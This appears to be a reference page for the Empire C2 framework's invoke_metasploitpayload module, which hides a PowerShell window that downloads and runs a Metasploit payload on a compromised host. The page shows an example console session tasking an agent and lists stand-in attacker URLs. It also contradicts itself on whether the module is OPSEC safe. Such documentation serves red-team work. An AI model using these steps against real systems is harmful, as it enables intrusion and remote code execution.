Invoke-MetasploitPayload - Empire Module

This page contains detailed information about how to use the powershell/code_execution/invoke_metasploitpayload Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Invoke-MetasploitPayload
Module: powershell/code_execution/invoke_metasploitpayload
Source code [1]: empire/server/modules/powershell/code_execution/invoke_metasploitpayload.yaml
Source code [2]: empire/server/data/module_source/code_execution/Invoke-MetasploitPayload.ps1
MITRE ATT&CK: T1055
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No

The invoke_metasploitpayload module spawns a new, hidden PowerShell window that downloadsand executes a Metasploit payload. This relies on theexploit/multi/scripts/web_delivery metasploit module.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the invoke_metasploitpayload module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the invoke_metasploitpayload module:

Agent
Agent to run Metasploit payload on.

URL
URL from the Metasploit web_delivery module.

Invoke_metasploitpayload Example Usage

---

Here's an example of how to use the invoke_metasploitpayload module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/code_execution/invoke_metasploitpayload

 Author       @jaredhaight                                                        
 Background   False                                                               
 Comments     https://github.com/jaredhaight/Invoke-MetasploitPayload/            
 Description  Spawns a new, hidden PowerShell window that downloadsand executes a 
              Metasploit payload. This relies on                                  
              theexploit/multi/scripts/web_delivery metasploit module.            
 Language     powershell                                                          
 Name         powershell/code_execution/invoke_metasploitpayload                  
 NeedsAdmin   False                                                               
 OpsecSafe    True                                                                
 Techniques   http://attack.mitre.org/techniques/T1055                            


,Record Options-,----------,-------------------------------------,
| Name  | Value | Required | Description                         |
|-------|-------|----------|-------------------------------------|
| Agent |       | True     | Agent to run Metasploit payload on. |
|-------|-------|----------|-------------------------------------|
| URL   |       | True     | URL from the Metasploit             |
|       |       |          | web_delivery module                 |
'-------'-------'----------'-------------------------------------'

(Empire: usemodule/powershell/code_execution/invoke_metasploitpayload) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/code_execution/invoke_metasploitpayload) > set URL value
[*] Set URL to value
(Empire: usemodule/powershell/code_execution/invoke_metasploitpayload) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author

---

• @jaredhaight

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/code_execution/invoke_metasploitpayload.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/code_execution/Invoke-MetasploitPayload.ps1
• https://github.com/jaredhaight/Invoke-MetasploitPayload/
• http://attack.mitre.org/techniques/T1055
• https://evil.example.com/[Random
• https://evil.example.com/2k1isEdsl
• https://github.com/jaredhaight/Invoke-MetasploitPayload

See Also

---

Check also the following modules related to this module:

• powershell/code_execution/invoke_ntsd
• powershell/code_execution/invoke_shellcodemsil
• powershell/code_execution/invoke_assembly
• powershell/code_execution/invoke_reflectivepeinjection
• powershell/code_execution/invoke_ironpython
• powershell/code_execution/invoke_clearscript
• powershell/code_execution/invoke_dllinjection
• powershell/code_execution/invoke_ironpython3
• powershell/code_execution/invoke_shellcode
• powershell/code_execution/invoke_ssharp
• powershell/code_execution/invoke_boolang
• powershell/lateral_movement/invoke_psexec
• powershell/lateral_movement/invoke_sqloscmd
• powershell/exploitation/invoke_spoolsample
• powershell/credentials/invoke_kerberoast
• powershell/credentials/invoke_internal_monologue
• powershell/credentials/invoke_ntlmextract
• powershell/management/invoke_script
• powershell/management/invoke_sharpchisel
• powershell/management/invoke_socksproxy
• powershell/lateral_movement/invoke_psremoting
• powershell/lateral_movement/invoke_executemsbuild
• powershell/lateral_movement/invoke_dcom
• powershell/lateral_movement/invoke_portfwd
• powershell/lateral_movement/invoke_smbexec
• powershell/lateral_movement/invoke_wmi
• powershell/lateral_movement/invoke_wmi_debugger
• powershell/lateral_movement/invoke_sshcommand
• python/code_execution/powershell_execution

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.